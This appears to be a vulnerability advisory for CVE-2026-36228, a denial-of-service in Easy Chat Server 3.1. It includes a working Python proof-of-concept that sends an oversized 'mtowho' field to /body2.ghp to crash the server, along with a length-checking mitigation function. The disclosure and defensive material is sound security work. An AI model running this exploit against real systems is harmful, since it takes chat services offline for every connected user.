# CVE-2026-36228: Easy Chat Server 3.1 Chat Message Denial of Service

## Summary

Easy Chat Server 3.1 contains a denial-of-service vulnerability in its chat message handling. After authenticating as a valid user and establishing a chat session, a remote attacker can submit a chat message request to `/body2.ghp` with an oversized `mtowho` recipient field. A `mtowho` value of approximately 40,000 `A` characters was observed to terminate the Easy Chat Server process.

This repository is for authorized security research and local reproduction only. Do not use it against systems you do not own or have explicit permission to test.

## Discoverer

Vaibhav D. Barkade

## Vulnerable Component

- Vendor/Product: Easy Chat Server
- Affected version: 3.1
- Component: Easy Chat Server Chat Room
- Endpoint: `/body2.ghp`
- Parameter: `mtowho`
- Attack type: Remote (authenticated)
- Impact: Denial of Service

## Impact

An authenticated remote user can crash the chat service process by sending an oversized recipient field in a chat message request. All connected users lose the service until it is restarted, and because the trigger is a single authenticated request, the attacker can repeat it after every restart.

## Reproduction

The PoC is dry-run by default and only builds and prints the request:

```bash
python3 poc.py 127.0.0.1 80
```

To transmit the request against an authorized lab target:

```bash
python3 poc.py 127.0.0.1 80 --send
```

If an authenticated session cookie is required:

```bash
python3 poc.py 127.0.0.1 80 --cookie 'SESSIONID=example' --send
```

The default oversized field is:

```text
mtowho=<40,000 A characters>
```

## Expected Result

On a vulnerable Easy Chat Server 3.1 instance, the server process may terminate immediately after processing the oversized chat message request. A crashed process typically answers the request with nothing at all or a reset connection, and subsequent connections to the service port fail until it is restarted.

## Root Cause

The chat message handler does not bound or validate the length of the `mtowho` recipient parameter before processing it.

## Mitigation

Enforce server-side length limits and recipient validation for `mtowho`. Reject oversized request fields before parsing them or copying them into fixed-size buffers; checking the request body size first means the oversized value is never parsed at all. Add defensive error handling around chat message processing and deploy the service with process supervision. Note that supervision only restores availability after each crash and does not remove the crash itself; until a vendor fix is available, limiting request body size in front of the service (for example at a reverse proxy) is the compensating control that actually stops the trigger from reaching the handler.
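The request described under Reproduction and the server-side length check described under Mitigation, as one added example. This is not the repository's `poc.py` and not Easy Chat Server code. It assumes a POST with a form-encoded body (the advisory does not state the HTTP method), sends only the `mtowho` field since no other form field is documented here, and uses placeholder limits (`MAX_FIELD`, `MAX_BODY`) plus a hypothetical `known_users` set for the recipient check.

```python
"""Added example for this advisory, not the repository's own poc.py.
Builds the oversized /body2.ghp request (dry-run by default) and shows
the server-side length check the Mitigation section calls for."""
import argparse
import socket
from urllib.parse import parse_qs, urlencode

ENDPOINT = "/body2.ghp"
FIELD = "mtowho"
DEFAULT_LEN = 40000   # the size observed to crash the server
MAX_FIELD = 64        # assumed recipient limit; the advisory gives no value
MAX_BODY = 4096       # assumed body limit for a single chat message


def build_body(length=DEFAULT_LEN):
    """Form body carrying the oversized recipient field.

    Only mtowho is documented in the advisory; whatever other fields the
    real chat form submits are unknown here and deliberately omitted.
    """
    return urlencode({FIELD: "A" * length}).encode()


def build_request(host, port, body, cookie=None):
    """Raw HTTP/1.1 request. POST with a form-encoded body is an assumption;
    the advisory does not state the method."""
    headers = [
        f"POST {ENDPOINT} HTTP/1.1",
        f"Host: {host}:{port}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
        "Connection: close",
    ]
    if cookie:
        headers.append(f"Cookie: {cookie}")
    return "\r\n".join(headers).encode() + b"\r\n\r\n" + body


def send(host, port, request, timeout=5.0):
    """Transmit the request; a crashed server answers with nothing or a reset."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        try:
            return sock.recv(4096)
        except (socket.timeout, ConnectionError):
            return b""


def check_message(body, known_users=None, max_body=MAX_BODY, max_field=MAX_FIELD):
    """Server-side check: reject oversized input before parsing or copying it.
    known_users is a hypothetical set of currently connected user names.
    Returns (accepted, reason)."""
    if len(body) > max_body:
        # Size is rejected on the raw body, so the 40,000-byte value is never parsed.
        return False, f"body too large: {len(body)} > {max_body}"
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    who = fields.get(FIELD, [""])[0]
    if not who or len(who) > max_field:
        return False, f"{FIELD} length {len(who)} not in 1..{max_field}"
    if known_users is not None and who not in known_users:
        return False, f"{FIELD} is not a connected user"
    return True, "ok"


def main():
    ap = argparse.ArgumentParser(description="CVE-2026-36228 request builder")
    ap.add_argument("host")
    ap.add_argument("port", type=int)
    ap.add_argument("--length", type=int, default=DEFAULT_LEN, help="mtowho length")
    ap.add_argument("--cookie", help="session cookie, e.g. 'SESSIONID=example'")
    ap.add_argument("--send", action="store_true", help="actually transmit")
    args = ap.parse_args()

    request = build_request(args.host, args.port, build_body(args.length), args.cookie)
    print(f"[built] {len(request)} bytes, {FIELD} length {args.length}")
    print(request[:160].decode("latin-1") + "...")
    if not args.send:
        print("[dry-run] pass --send to transmit against an authorized lab target")
        return
    reply = send(args.host, args.port, request)
    print("[sent] reply:", reply[:100] or b"<none: server closed the connection or crashed>")


if __name__ == "__main__":
    main()
```

Run with no flags for a dry run that only prints the request; `--send` transmits it to an authorized lab host. The `check_message` function rejects on raw body size before `parse_qs` runs, which is the order the Mitigation section asks for: the oversized recipient is discarded without ever being parsed or copied.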